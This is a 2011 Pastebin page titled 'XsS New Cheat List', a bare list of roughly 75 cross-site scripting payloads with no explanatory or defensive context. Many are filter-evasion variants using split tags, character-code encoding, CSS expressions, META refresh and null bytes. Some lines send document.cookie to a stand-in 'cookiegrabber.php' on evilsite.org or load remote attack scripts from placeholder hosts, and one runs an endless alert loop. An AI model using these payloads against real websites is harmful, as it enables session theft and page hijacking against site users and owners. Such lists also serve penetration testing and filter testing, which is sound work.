Want more features on Pastebin? Sign Up, it's FREE!
Guest

XSS

By: a guest on Jun 27th, 2011  |  syntax: HTML  |  size: 3.99 KB  |  views: 803  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. /* XsS New Cheat List */
  2.  
  3.  
  4. <script>alert(1);</script>
  5.  
  6. <script>alert('XSS');</script>
  7.  
  8. <script src="http://www.evilsite.org/cookiegrabber.php"></script>
  9.  
  10. <script>location.href="http://www.evilsite.org/cookiegrabber.php?cookie="+escape(document.cookie)</script>
  11.  
  12. <scr<script>ipt>alert('XSS');</scr</script>ipt>
  13.  
  14. <script>alert(String.fromCharCode(88,83,83))</script>
  15.  
  16. <img src=foo.png onerror=alert(/xssed/) />
  17.  
  18. <style>@im\port'\ja\vasc\ript:alert(\"XSS\")';</style>
  19.  
  20. <? echo('<scr)'; echo('ipt>alert(\"XSS\")</script>'); ?>
  21.  
  22. <marquee><script>alert('XSS')</script></marquee>
  23.  
  24. <IMG SRC=\"jav&#x09;ascript:alert('XSS');\">
  25.  
  26. <IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">
  27.  
  28. <IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">
  29.  
  30. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  31.  
  32. "><script>alert(0)</script>
  33.  
  34. <script src=http://yoursite.com/your_files.js></script>
  35.  
  36. </title><script>alert(/xss/)</script>
  37.  
  38. </textarea><script>alert(/xss/)</script>
  39.  
  40. <IMG LOWSRC=\"javascript:alert('XSS')\">
  41.  
  42. <IMG DYNSRC=\"javascript:alert('XSS')\">
  43.  
  44. <font style='color:expression(alert(document.cookie))'>
  45.  
  46. '); alert('XSS
  47.  
  48. <img src="javascript:alert('XSS')">
  49.  
  50. <script language="JavaScript">alert('XSS')</script>
  51.  
  52. [url=javascript:alert('XSS');]click me[/url]
  53.  
  54. <body onunload="javascript:alert('XSS');">
  55.  
  56. <body onLoad="alert('XSS');"
  57.  
  58. [color=red' onmouseover="alert('xss')"]mouse over[/color]
  59. "/></a></><img src=1.gif onerror=alert(1)>
  60.  
  61. window.alert("Bonjour !");
  62.  
  63. <div style="x:expression((window.r==1)?'':eval('r=1;
  64. alert(String.fromCharCode(88,83,83));'))">
  65.  
  66. <iframe<?php echo chr(11)?> onload=alert('XSS')></iframe>
  67.  
  68. "><script alert(String.fromCharCode(88,83,83))</script>
  69.  
  70. '>><marquee><h1>XSS</h1></marquee>
  71.  
  72. '">><script>alert('XSS')</script>
  73.  
  74. '">><marquee><h1>XSS</h1></marquee>
  75.  
  76. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">
  77.  
  78. <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">
  79.  
  80. <script>var var = 1; alert(var)</script>
  81.  
  82. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  83.  
  84. <?='<SCRIPT>alert("XSS")</SCRIPT>'?>
  85.  
  86. <IMG SRC='vbscript:msgbox(\"XSS\")'>
  87.  
  88. " onfocus=alert(document.domain) "> <"
  89. <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>
  90.  
  91. <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS
  92.  
  93. perl -e 'print \"<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>\";' > out
  94.  
  95. perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out
  96.  
  97. <br size=\"&{alert('XSS')}\">
  98.  
  99. <scrscriptipt>alert(1)</scrscriptipt>
  100.  
  101. </br style=a:expression(alert())>
  102.  
  103. </script><script>alert(1)</script>
  104.  
  105. "><BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  106.  
  107. [color=red width=expression(alert(123))][color]
  108.  
  109. <BASE HREF="javascript:alert('XSS');//">
  110.  
  111. Execute(MsgBox(chr(88)&chr(83)&chr(83)))<
  112.  
  113. "></iframe><script>alert(123)</script>
  114.  
  115. <body onLoad="while(true) alert('XSS');">
  116.  
  117. '"></title><script>alert(1111)</script>
  118.  
  119. </textarea>'"><script>alert(document.cookie)</script>
  120.  
  121. '""><script language="JavaScript"> alert('X \nS \nS');</script>
  122.  
  123. </script></script><<<<script><>>>><<<script>alert(123)</script>
  124.  
  125. <html><noalert><noscript>(123)</noscript><script>(123)</script>
  126.  
  127. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  128.  
  129. '></select><script>alert(123)</script>
  130.  
  131. '>"><script src = 'http://www.site.com/XSS.js'></script>
  132.  
  133. }</style><script>a=eval;b=alert;a(b(/XSS/.source));</script>
  134.  
  135. <SCRIPT>document.write("XSS");</SCRIPT>
  136.  
  137. a="get";b="URL";c="javascript:";d="alert('xss');";eval(a+b+c+d);
  138.  
  139. ='><script>alert("xss")</script>
  140.  
  141. <script+src=">"+src="http://yoursite.com/xss.js?69,69"></script>
  142.  
  143. <body background=javascript:'"><script>alert(navigator.userAgent)</script>></body>
  144.  
  145. ">/XaDoS/><script>alert(document.cookie)</script><script src="http://www.site.com/XSS.js"></script>
  146.  
  147. ">/KinG-InFeT.NeT/><script>alert(document.cookie)</script>
  148.  
  149. src="http://www.site.com/XSS.js"></script>
  150.  
  151. data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
clone this paste RAW Paste Data